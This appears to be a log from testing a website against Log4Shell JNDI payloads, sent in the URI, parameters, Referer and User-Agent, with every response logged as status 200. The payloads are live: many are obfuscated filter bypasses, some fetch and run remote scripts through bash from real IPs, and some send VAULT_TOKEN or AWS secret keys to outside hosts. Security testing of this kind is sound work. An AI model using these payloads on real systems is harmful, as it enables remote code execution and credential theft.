Input get from file: ${jndi:ldap://7ae364cd167c.bingsearchlib.com:39356/a}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi:ldap://7ae364cd167c.bingsearchlib.com:39356/a}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${jndi:ldaps://e873c483.probe001.log4j.leakix.net:443/b%7D
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi:ldaps://e873c483.probe001.log4j.leakix.net:443/b%7D
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${jndi:rmi://${env:VAULT_TOKEN}.example.com}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi:rmi://${env:VAULT_TOKEN}.example.com}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${jndi:dns://31-134-204-142.scanworld.net/ua}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi:dns://31-134-204-142.scanworld.net/ua}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zOC44Ni4xOS4zNDo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMzguODYuMTkuMzQ6NDQzKXxiYXNo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zOC44Ni4xOS4zNDo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMzguODYuMTkuMzQ6NDQzKXxiYXNo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164.160:8081/w}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164.160:8081/w}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MCl8YmFzaA==}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MCl8YmFzaA==}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${${env:BEETLEJUICE:-j}ndi${env:BEETLEJUICE:-:}${env:BEETLEJUICE:-l}dap://205.185.115.217:47324/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${env:BEETLEJUICE:-j}ndi${env:BEETLEJUICE:-:}${env:BEETLEJUICE:-l}dap://205.185.115.217:47324/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${${lower:jn}di:ldap://172.31.39.127:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${lower:jn}di:ldap://172.31.39.127:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: param
 uri : http://test.toffstech-test.onl.ac/index.php/?url=${${lower:jn}di:ldap://172.31.39.127:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: ref
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: http://test.toffstech-test.onl.ac/index.php/${${lower:jn}di:ldap://172.31.39.127:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: userAgent
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: 
 userAgent: ${${lower:jn}di:ldap://172.31.39.127:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}
 --------output---------
 statusCode: 200

		
Input get from file: ${${l${lower:ow}er:j}ndi:ldap://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${l${lower:ow}er:j}ndi:ldap://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: param
 uri : http://test.toffstech-test.onl.ac/index.php/?url=${${l${lower:ow}er:j}ndi:ldap://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: ref
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: http://test.toffstech-test.onl.ac/index.php/${${l${lower:ow}er:j}ndi:ldap://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: userAgent
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: 
 userAgent: ${${l${lower:ow}er:j}ndi:ldap://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 --------output---------
 statusCode: 200

		
Input get from file: ${jndi${lower::}ldap:${lower:/}/172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi${lower::}ldap:${lower:/}/172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${jndi${lower::${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}}ldap:${lower:/}/172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi${lower::${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}${lower:}}ldap:${lower:/}/172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${jndi:ldap://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi:ldap://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: param
 uri : http://test.toffstech-test.onl.ac/index.php/?url=${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: ref
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: http://test.toffstech-test.onl.ac/index.php/${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: userAgent
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: 
 userAgent: ${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 --------output---------
 statusCode: 200

		
Input get from file: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: param
 uri : http://test.toffstech-test.onl.ac/index.php/?url=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: ref
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: http://test.toffstech-test.onl.ac/index.php/${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: userAgent
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: 
 userAgent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 --------output---------
 statusCode: 200

		
Input get from file: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//172.31.39.127:1389/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:dn}${lower:s}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:dn}${lower:s}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: param
 uri : http://test.toffstech-test.onl.ac/index.php/?url=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:dn}${lower:s}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: ref
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: http://test.toffstech-test.onl.ac/index.php/${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:dn}${lower:s}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: userAgent
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: 
 userAgent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:dn}${lower:s}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 --------output---------
 statusCode: 200

		
Input get from file: ${${::-j}ndi:rmi://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${::-j}ndi:rmi://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:iio}${lower:p}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:iio}${lower:p}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: param
 uri : http://test.toffstech-test.onl.ac/index.php/?url=${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:iio}${lower:p}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: ref
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: http://test.toffstech-test.onl.ac/index.php/${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:iio}${lower:p}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: userAgent
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: 
 userAgent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:iio}${lower:p}}://${hostName}.fakehost.local:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 --------output---------
 statusCode: 200

		
Input get from file: ${${lower:jndi}:${lower:rmi}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${lower:jndi}:${lower:rmi}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: param
 uri : http://test.toffstech-test.onl.ac/index.php/?url=${${lower:jndi}:${lower:rmi}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: ref
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: http://test.toffstech-test.onl.ac/index.php/${${lower:jndi}:${lower:rmi}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 userAgent: 
--------output---------
 statusCode: 200

--------input---------
 case: userAgent
 uri : http://test.toffstech-test.onl.ac/index.php
 referer: 
 userAgent: ${${lower:jndi}:${lower:rmi}://172.31.39.127:1399/Basic/Command/Base64/ZWNobyAidGVzdCIgPiAvdG1wL3B3bgo}
 --------output---------
 statusCode: 200

		
Input get from file: ${jndi:ldap://172.31.39.127:1399/path/${env:aws_secret_key}}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${jndi:ldap://172.31.39.127:1399/path/${env:aws_secret_key}}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

Input get from file: ${${::-j}ndi:rmi://attacker.com/poc}
--------input---------
 case: only uri
 uri : http://test.toffstech-test.onl.ac/index.php/${${::-j}ndi:rmi://attacker.com/poc}
 referer: 
 userAgent: 
--------output---------
 statusCode: 200

